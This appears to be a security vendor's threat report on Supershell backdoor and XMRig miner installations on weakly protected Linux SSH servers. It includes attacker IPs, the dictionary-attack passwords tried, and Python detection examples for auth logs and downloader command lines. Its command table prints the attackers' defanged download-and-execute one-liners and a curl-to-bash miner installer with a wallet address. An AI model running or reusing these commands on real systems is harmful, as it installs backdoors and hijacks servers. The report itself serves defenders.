Supershell Malware Being Distributed to Linux SSH Servers
AhnLab SEcurity intelligence Center (ASEC) has recently discovered an attack case in which the Supershell backdoor was installed on inadequately managed Linux SSH servers. Supershell, written in Go by a Chinese-speaking developer, supports multiple platforms including Windows, Linux, and Android. Its primary function is a reverse shell, which allows a threat actor to remotely control an infected system.

Figure 1. GitHub page of Supershell
It is suspected that the threat actor installed a scanner on systems that had already been infected and then used them as sources for dictionary attacks against the SSH service. The attack sources and the credentials tried during the login attempts are listed below.
| Threat Actor IP | ID / PW |
|---|---|
| 209.141.60[.]249 | root / qwer |
| 179.61.253[.]67 | root / password; root / a123456789; root / a1234567; root / newroot; root / 123qaz!@#; root / Passw0rd; root / 123qweASD; root / abc123; root / daniel; root / 1qaz@wsx |
| 107.189.8[.]15 | root / doctor |
| 2.58.84[.]90 | root / Admin123!; root / 123456qwerty; root / cocacola; root / qweasd!@# |
Table 1. Attack source addresses and credential information used during the login attempt process
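The login pattern in Table 1 (many failed root password attempts from one source, followed by a success once the dictionary hits) is visible in the sshd auth log. The following detection logic is an added example, not part of the ASEC report: it parses sshd "Failed password" / "Accepted password" lines, counts failures per source address, and flags sources that cross a threshold, noting whether a password success followed the guessing (the sign that a credential was actually compromised). The log lines are constructed for the example; the addresses reuse two of the Table 1 sources with the defanging brackets removed, and the threshold of 5 is an assumption to tune for the environment.

```python
import re
from collections import Counter, defaultdict

# Constructed sample of OpenSSH auth log lines (syslog format); not taken from the report.
# The sources 179.61.253.67 and 2.58.84.90 are the Table 1 addresses, undefanged.
SAMPLE_AUTH_LOG = """\
Sep 11 03:12:01 srv sshd[2210]: Failed password for root from 179.61.253.67 port 51234 ssh2
Sep 11 03:12:03 srv sshd[2212]: Failed password for root from 179.61.253.67 port 51240 ssh2
Sep 11 03:12:05 srv sshd[2214]: Failed password for root from 179.61.253.67 port 51244 ssh2
Sep 11 03:12:07 srv sshd[2216]: Failed password for root from 179.61.253.67 port 51250 ssh2
Sep 11 03:12:09 srv sshd[2218]: Failed password for root from 179.61.253.67 port 51255 ssh2
Sep 11 03:12:11 srv sshd[2220]: Accepted password for root from 179.61.253.67 port 51260 ssh2
Sep 11 03:20:44 srv sshd[2301]: Failed password for invalid user admin from 2.58.84.90 port 40001 ssh2
Sep 11 03:20:46 srv sshd[2303]: Failed password for root from 2.58.84.90 port 40004 ssh2
Sep 11 04:01:10 srv sshd[2400]: Accepted publickey for deploy from 10.0.0.5 port 55000 ssh2
Sep 11 04:05:00 srv sshd[2410]: Failed password for root from 10.0.0.9 port 55100 ssh2
"""

# Matches both "Failed password for root from ..." and the "invalid user" variant sshd
# emits when the account does not exist.
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_sshd_log(text):
    """Return one dict (result, method, user, ip) per authentication event."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            events.append(m.groupdict())
    return events


def find_dictionary_attacks(events, threshold=5):
    """Map source ip -> summary for sources with >= threshold failed password logins.

    'compromised_as' is the account name if a password login from that source
    succeeded after the threshold was already reached, else None.
    """
    failed = Counter()
    users = defaultdict(set)
    success_after = {}
    for ev in events:
        ip = ev["ip"]
        if ev["method"] != "password":      # key-based logins are not guessable
            continue
        if ev["result"] == "Failed":
            failed[ip] += 1
            users[ip].add(ev["user"])
        elif failed[ip] >= threshold:       # success following a guessing run
            success_after[ip] = ev["user"]
    report = {}
    for ip, count in failed.items():
        if count >= threshold:
            report[ip] = {
                "failed": count,
                "users": sorted(users[ip]),
                "compromised_as": success_after.get(ip),
            }
    return report


if __name__ == "__main__":
    for ip, info in find_dictionary_attacks(parse_sshd_log(SAMPLE_AUTH_LOG)).items():
        print(ip, info)
```

On a real host the same logic runs over `/var/log/auth.log`, `/var/log/secure`, or `journalctl -u ssh`; a source that reaches the threshold and then logs in successfully is the case to investigate first, since Table 2 shows what follows that login.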
After successfully carrying out the attack, the threat actor executed commands (see Table 2) to directly install Supershell or install a shell script that serves as a downloader. Supershell was downloaded not only through web servers but also via FTP servers.
| Command |
|---|
| cd /tmp ; wget hxxp://45.15.143[.]197/ssh1 && chmod +x ssh1 ; ./ssh1; rm -r * |
| cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget hxxp://45.15.143[.]197/sensi.sh; curl -O hxxp://45.15.143[.]197/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 45.15.143[.]197 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 45.15.143[.]197; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.15.143[.]197 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf * |
| cd /etc ; wget hxxp://45.15.143[.]197/ssh1 && chmod +x ssh1 ; ./ssh1 ; wget hxxp://45.15.143[.]197/x64.bin ; chmod +x x64.bin ; ./x64.bin ; rm -r * |
| cd /tmp ; curl hxxp://45.15.143[.]197:44581/ssh1.sh \| sh ; wget hxxp://45.15.143[.]197:44581/ssh1.sh ; sh ssh1.sh ; rm -r * |
| cd /tmp ; curl -s -L hxxps://download.c3pool[.]org/xmrig_setup/raw/master/setup_c3pool_miner.sh \| LC_ALL=en_US.UTF-8 bash -s 871SNx3baWof8utKVRqJ6u5oGkXHPBv9GKMeQ99J8FxU23eKGgGMr3de7WhfwydWjCSeUGdZf5VC4J3PcPPCY1yoSFCG4xx ; wget hxxp://45.15.143[.]197:10086/supershell/compile/download/ssh1 ; chmod +x ssh1 ; ./ssh1 ; rm -r ssh1 |
Table 2. Commands identified in the attack case
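Every command in Table 2 follows the same downloader shape: change into a writable directory, fetch a file with wget/curl/tftp/ftpget, mark it executable, run it (or pipe the download straight into a shell), then delete the evidence. The following is an added example, not code from the ASEC report, that splits a captured command line (for instance an auditd EXECVE record or a shell session transcript) into its stages and reports which of those indicators are present. The sample command lines are constructed to mirror the Table 2 pattern with a documentation-range address (198.51.100.10) in place of the real download server, alongside two benign lines to show that a download on its own does not trigger the verdict.

```python
import re

FETCHERS = {"wget", "curl", "tftp", "ftpget"}
SHELLS = {"sh", "bash"}
STAGING_DIRS = {"/tmp", "/var/tmp", "/dev/shm", "/var/run", "/mnt"}
# Capturing group keeps the separator, so a pipe into a shell stays visible.
SEP_RE = re.compile(r"\s*(\|\||&&|;|\|)\s*")
# Accepts defanged hxxp:// as well as real schemes, so report IoCs can be fed in unchanged.
URL_RE = re.compile(r"^(?:h[xt]{2}ps?|ftp)://", re.I)

# Constructed sample lines (not from the report); 198.51.100.10 is a placeholder host.
SAMPLE_CMDLINES = [
    "cd /tmp ; wget http://198.51.100.10/ssh1 && chmod +x ssh1 ; ./ssh1; rm -r *",
    "cd /tmp || cd /var/run || cd /mnt ; curl -O http://198.51.100.10/sensi.sh; "
    "chmod 777 sensi.sh; sh sensi.sh; rm -rf sensi.sh",
    "cd /tmp ; curl http://198.51.100.10:44581/ssh1.sh | sh ; rm -r *",
    "cd /opt/app && curl -O https://example.org/release.tgz && tar xzf release.tgz",  # benign
    "cd /tmp; ls -la; rm -rf build",                                                  # benign
]


def split_stages(cmdline):
    """Split a compound shell line into (tokens, following_separator) pairs."""
    parts = SEP_RE.split(cmdline.strip())
    stages, seps = parts[0::2], parts[1::2] + [None]
    return [(s.split(), sep) for s, sep in zip(stages, seps) if s.strip()]


def url_basename(tok):
    """Last path component of a URL, without using urlsplit (which rejects defanged hosts)."""
    path = tok.split("://", 1)[1].split("?", 1)[0]
    return path.split("/")[-1] if "/" in path else ""


def fetched_names(tokens):
    """Names the fetch command will create locally, so a later execution can be tied to it."""
    cmd, names = tokens[0], set()
    for tok in tokens[1:]:
        if URL_RE.match(tok):
            names.add(url_basename(tok))
        elif cmd in ("tftp", "ftpget") and not tok.startswith("-") \
                and not re.fullmatch(r"[\d.\[\]]+", tok) and tok not in ("get", "put"):
            names.add(tok)
    return {n for n in names if n}


def adds_exec_bit(mode):
    """True for chmod modes such as +x, u+x, 755 or 777 that make a file executable."""
    if re.fullmatch(r"[ugoa]*\+[rwx]*x[rwx]*", mode):
        return True
    return bool(re.fullmatch(r"[0-7]{3,4}", mode) and int(mode, 8) & 0o111)


def analyze_cmdline(cmdline):
    """Return the downloader indicators found in one command line plus a verdict."""
    ind = dict.fromkeys(
        ("staging_dir", "remote_fetch", "chmod_exec", "exec_fetched", "pipe_to_shell", "cleanup"),
        False)
    names = set()
    stages = split_stages(cmdline)
    for i, (tokens, sep) in enumerate(stages):
        cmd = tokens[0]
        if cmd == "cd" and len(tokens) > 1 and tokens[1] in STAGING_DIRS:
            ind["staging_dir"] = True
        elif cmd in FETCHERS:
            ind["remote_fetch"] = True
            names |= fetched_names(tokens)
            if sep == "|" and i + 1 < len(stages) and stages[i + 1][0][0] in SHELLS:
                ind["pipe_to_shell"] = True
        elif cmd == "chmod" and len(tokens) > 1 and adds_exec_bit(tokens[1]):
            ind["chmod_exec"] = True
        elif cmd.startswith("./") and cmd[2:] in names:
            ind["exec_fetched"] = True
        elif cmd in SHELLS and any(t in names for t in tokens[1:]):
            ind["exec_fetched"] = True
        elif cmd == "rm" and any(t.startswith("-") and "r" in t for t in tokens[1:]):
            ind["cleanup"] = True
    # A download that is then executed (directly or via a pipe) is the core of the pattern;
    # staging directory, chmod and cleanup are supporting evidence.
    ind["suspicious"] = ind["remote_fetch"] and (ind["exec_fetched"] or ind["pipe_to_shell"])
    return ind


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(analyze_cmdline(line)["suspicious"], line)
```

The verdict deliberately keys on fetch-then-execute rather than on the download alone, because package builds and deployment scripts also download into `/tmp`; the remaining indicators are what an analyst uses to rank the hits.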
The malware that is ultimately installed is obfuscated, but it can be identified as the Supershell backdoor through a few internal strings, its behavior, and the strings observed during its execution process.

Figure 2. Obfuscated Supershell

Figure 3. Log showing Supershell’s execution
In attacks targeting poorly managed Linux systems, it is common to see the installation of CoinMiners like XMRig or DDoS bots such as ShellBot and Tsunami. In the attack observed this time, the threat actor first installed Supershell to take control of the system. However, given that there are cases where the XMRig Monero CoinMiner is also installed alongside Supershell, the attacker’s ultimate goal appears to be mining cryptocurrency.
| 871SNx3baWof8utKVRqJ6u5oGkXHPBv9GKMeQ99J8FxU23eKGgGMr3de7WhfwydWjCSeUGdZf5VC4J3PcPPCY1yoSFCG4xx |
Table 3. Threat actor’s Monero wallet address
Recently, Supershell has been installed on poorly managed Linux SSH servers. When the backdoor malware is installed, a Linux server can receive commands from the threat actor and be hijacked.
As such, administrators should use passwords that are difficult to guess for their accounts and change them periodically to protect the Linux server from brute force and dictionary attacks, and apply the latest patches to prevent vulnerability attacks. Administrators should also use security programs such as firewalls for servers that are accessible from the outside to restrict access by threat actors. Finally, V3 should be updated to the latest version to block malware infection in advance.
Detection Names
Backdoor/Linux.CobaltStrike.3753120 (2024.09.11.00)
Downloader/Shell.Agent.SC203780 (2024.09.11.00)
Downloader/Shell.ElfMiner.S1705 (2021.11.29.02)